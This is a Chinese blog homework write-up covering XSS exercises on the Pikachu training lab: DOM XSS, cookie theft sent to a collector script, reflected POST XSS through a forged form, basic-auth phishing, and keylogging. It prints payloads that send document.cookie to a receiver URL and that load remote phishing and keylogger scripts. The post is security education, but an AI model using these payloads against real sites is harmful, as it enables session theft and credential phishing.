第七周作业 1.dom型XSS详解及演示 2.cookie获取及xss后台使用 3.反射型XSS(POST) 4.xss钓鱼演示 5.xss获取键盘记录演示

最新推荐文章于 2024-07-26 00:00:00 发布
最新推荐文章于 2024-07-26 00:00:00 发布
阅读量1.8k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43899561/article/details/89429726
版权

1.dom型XSS详解及演示

一、什么是DOM?怎么理解DOM?
DOM全称是Document Object Model,也就是文档对象模型。我们可以将DOM理解为,一个与系统平台和编程语言无关的接口,程序和脚本可以通过这个接口动态地访问和修改文档内容、结构和样式。当创建好一个页面并加载到浏览器时,DOM就悄然而生,它会把网页文档转换为一个文档对象,主要功能是处理网页内容。故可以使用 Javascript 语言来操作DOM以达到网页的目的。

二、dom型XSS详解及演示

首先DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。
在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document
object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用
(从别人那儿扣来的解释,附上原文章连接https://www.jianshu.com/p/190dedd585f2)

在pikachu平台下dom型xss栏目中,随意输入后,到后台来查看源代码,找出可注入点是"<a href='"+str+"'>what do you see?</a>";通过修改输出来改写一个payload。

<a href='"+str+"'>what do you see?</a>中str这个变量删除掉,再构造一个闭合,这样就能实现对a标签的一个“控制”的作用。在代码行呈现为在这里插入图片描述

在这里插入图片描述输入payload#' "alert('你打篮球像yangshuang')"提交,点击what do you see?能看到返回结果,但是刷新一次过后就会消息,区别于反射型和存储型是不与后台进行交互的。此处仅仅是演示DOM型的基本原理。
在这里插入图片描述

点击dom型XSS-X栏目,同之前的步骤,查看后端的源代码,区别第一个DOM演示,输入是从URL的参数中获取的(类似于反射型),但输出任在a标签里,故和之前的方法相同设置payload
在这里插入图片描述
输入后提交,依次点击返回如下。由于输入是从URL的参数中获取,同反射性原理相似,只需要将连接发送给要攻击的用户,写在URL中的JS代码就被会插入到用户的页面中。
在这里插入图片描述

2.cookie获取及xss后台使用

一个简单思路:
在这里插入图片描述
到pikachu平台下管理工具,进去初始化平台,更具提示到相应的文件中进行配置。输入设置的payload :<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>回到攻击平台就能获得相应的数据。
在这里插入图片描述
得到的refer在发送给攻击目标,攻击目标在点击URL连接就会弹到重定向的页面去,攻击者就能获得被攻击目标的cookie

在这里插入图片描述

3.反射型XSS(POST)

POST请求区别与GET请求,POST请求不能从URL让用户向服务器提交数据。所以为了进行注入,需要让用户代替攻击者提交POST请求,这就需要攻击者自己搭建站点,然后再站点内写一个POST表单,将我们搭建出的连接发给用户,这样就能让用户帮攻击者提交POST请求发给存在XSS漏洞的中。这样就能窃取到用户的cookie,就能伪造用户登陆达到破坏的目的。
先看一下提前写好的表单,form表单中action就是提交存在漏洞的网页的地址,input中value的值就是我们输入的恶意代码。伪造好的连接:127.0.0.1/pikachu/pkxss/xcookie/post.html

在这里插入图片描述
等待页面的返回,就能回到平台上查看到抓到的cookie

在这里插入图片描述

4.xss钓鱼演示

类似于获取cookie的方法,我们向web中嵌入一个恶意的JS代码,当用户浏览这个网页时,就会执行嵌入的恶意代码,从而达到攻击用户的目的。
演示一个基于basic认证的钓鱼演示,先看远端设置好的php文件,和接口的php文件,将重定向的位置设置为xss平台的一个接口php文件的地址。在这里插入图片描述

在这里插入图片描述
输入我们写好的JS恶意代码:<img src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"/>点击提交就会弹窗,输入用户名和密码后,就能在xss平台上查看截取的数据。

在这里插入图片描述
在这里插入图片描述

5.xss获取键盘记录演示

一、什么是跨域
当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同域之间请求数据的操作,称为跨域操作。
二、同源策略
为了安全考虑,所有浏览器都约定了“同源策略”,同源策略禁止页面加载或执行与自身来源不同的域的任何脚本既不同域之间不能使用JS进行操作。比如:x.com域名下的js不能操作y.com域名下的对象
那么为什么要有同源策略? 比如一个恶意网站的页面通过iframe嵌入了银行的登录页面(二者不同源),如果没有同源限制,恶意网页上的javascript脚本就可以在用户登录银行的时候获取用户名和密码。

同之前的案例到后台设置好Access-Control-Allow-Origin,设置为*,既允许所有人访问。在这里插入图片描述,输入设置好的恶意JS代码:
<script src="http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js"></script>然后在键盘上随意输入,就可以到xss平台上去查看键盘输入的结果

Frion_A
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反射/存储/DOMXSS攻击原理及攻击流程详解
G3et的博客
01-02 1975
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
【网络攻防】“跨站脚本攻击“ 第一弹 ——反射XSS
翼安研习社的博客
01-28 2405
撰稿|谢泳 编辑|王聪丽 信息收集|谢泳** 目录1. 初识XSS2. 反射XSS2.1 Cookie劫持2.2 Get请求2.3 Post请求3. 防御方式 1. 初识XSS 跨站脚本攻击(Cross Site Script, XSS)是利用web前端代码注入来篡改页面,执行恶意脚本,达到窃取数据、冒充身份等目的的攻击方法。 浏览器根据HTML代码解析页面,现在的HTML中可以有很多JavaScript脚本,XSS攻击则是利用前端代码的漏洞,插入恶意代码。 XSS攻击者必须有一定的JavaScri.
xss反射post_反射XSS 你要控技你记几
weixin_39882589的博客
01-31 221
本文是Web安全入门系列的第8篇文章01 反射XSSXSS注入的时候,我们会经常看到这样的代码:上一篇文章已经讲过了,这句代码并不能真正的跨站,它真正的作用是:检测当前页面存在XSS攻击的可能性说人话就是:能执行这句话说明实施XSS攻击的可能性较大,但不代表一定能成功;不能执行这句话,说明实施XSS攻击的可能性较小,但也不代表一定不能成功。...
反射domxss的区别【源码分析】
最新发布
2301_80064376的博客
07-26 2201
攻击点反射 XSS:恶意代码通过 HTTP 请求发送到服务器,并在服务器响应中反射回客户端。DOM XSS:恶意代码直接在客户端(浏览器)中通过 JavaScript 动态生成和执行。执行位置反射 XSS:服务器响应时执行。DOM XSS:客户端 JavaScript 处理时执行。防御重点反射 XSS:服务器端的输入验证和输出编码。DOM XSS:客户端 JavaScript 的输入验证和安全的 DOM 操作。
5.XSS-反射(post)利用:获取cookie
愿听风成曲
06-23 315
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常网站去访问。基于IP地址配置文件。
pikachu靶场第六关——XSS(跨站脚本)之反射xss(post)(附代码审计)
yzasts的博客
03-18 515
这个是登录框的代码,需要登陆成功后,才有xss,用户名:admin,密码:123456。和上一关是一样,甚至这一个还没有长度限制,只是get变成了post而已。代码的话,只是加了个cookie,和xss漏洞关系不是很大,就不讲了。
皮卡丘(pikachu) XSS三种类举例
weixin_44787832的博客
07-22 3500
反射xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GETXSS漏洞,一般可将含XSS的URL伪.
DOMXSS;cookie获取XSS后台使用XSS钓鱼演示XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2208
DOMXSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOMXSS漏洞演示 ...
反射xss攻击代码.rar
05-14
**反射XSS攻击详解** 反射跨站脚本攻击(Reflected Cross-Site Scripting,简称反射XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛...
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
7. 总结: XSS攻击是Web应用安全中的重要威胁,理解其原理和防范措施对于开发者和网络安全爱好者至关重要。通过学习和实践,我们可以提高网站的安全性,保护用户的信息安全。同时,持续关注网络安全领域的最新动态...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
存储XSS反射XSSDOMXSS不同,它不是通过URL参数或者DOM动态生成的,而是将恶意代码存储在了服务器上,比如用户评论、论坛帖子等地方。当其他用户访问这些含有恶意代码的页面时,浏览器会执行其中的脚本,...
Dom-xss_validator:一个基本的dom-xss验证器,方法是发送精心制作的有效负载并期望在用户控制的服务器上做出响应
05-13
Dom-xss_validator 一个基本的dom-xss验证器,方法是发送精心制作的有效负载并期望在用户控制的服务器上做出响应。 组件 verifier.sh:采用一个参数,该参数是一个文本文件,每行包含一个URL的URL包含DomXSS有效负载。 verifier.js:phantomjs脚本,它将打开页面并解析javascript。 如何模糊DomXSS 让我重申,这只是基本的dom xss验证,而不是模糊测试。 它仅验证domxss是否存在于URL上。 如何使用 确保设置以下内容 幻影 base64模块 每行只有一个网址的文件。 如何检测DomXSS 为了检测domXSS,我们可以尝试执行以下有效负载。 [removed] = 并在本地主机上的8081端口启动simpleserver 因为这是127.0.0.1,所以没有任何请求在用户计算机之外发出
pikachu-反射xss(get)
weixin_30377461的博客
08-18 554
  首先打开漏洞网页,发现输入的长度好像被限制了, 我们便F12查看源代码,发现长度被限制成了20,而且还是前端验证的,我们可以直接修改为100 在我们的输入框中,输入 <script>alert(3)</script>, 便看到可以弹窗了 转载于:https://www.cnblogs.com/kuail...
反射 XSS 攻击演示(附链接)
Flag少侠的博客
01-22 2332
反射 XSS 攻击演示(附链接)
pikachu漏洞练习平台使用笔记-XSS反射XSS
donghongzhe的博客
05-24 1799
在表单里直接输入xss语句,会发现限制字符长度,我们可以审查元素,把长度20改大一点,就恶意输入更多字符了,但是每次刷新后还会重新变为20,所以还是直接在网址框里输入吧 我们输入一个简单的XSS语句 <script>alert("XSS")</script> 发现可以解析,即存在XSS漏洞 接下来,我们简单利用一下这个反射XSS漏洞,来获取用户cookie 我们需要一个接收cookie的服务器(127.0.0.1:80),来接收受害主机的cookie 下..
pikachu靶场-XSS
braty_的博客
02-21 1467
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
通过DVWA学习反射XSS漏洞
Mi1k7ea
03-04 4890
XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。关于其更具体的描述在网上也很多资料这里就不多说了直接进行总结整合。 XSS漏洞
反射XSS+文件上传+CSRF组合系列—DVWA
北风
11-04 848
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/83713678 在学习的过程中,想到将几种漏洞进行组合练习,记录下学习过程。大佬请绕过!谢谢!! 测试环境:DVWA,安装方法参考上一篇:https://blog.csdn.net/qq_36711453/article/details/83713631 前期知识:了解反...
Pikachu第二弹:XSS
Pisces_mango的博客
08-14 1567
一、反射xss(get) 1.输入语句,发现有长度限制,按F12,修改源码字符长度 2.输入语句 3.出现弹窗 二、反射xsspost) 1.输入账号密码登录 2.登录XSS后台,然后搭建恶意站点 这里是以POST的方式提交的,参数内容不会出现在URL中,这时候我们不能直接把我们的恶意代码嵌入到URL中,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值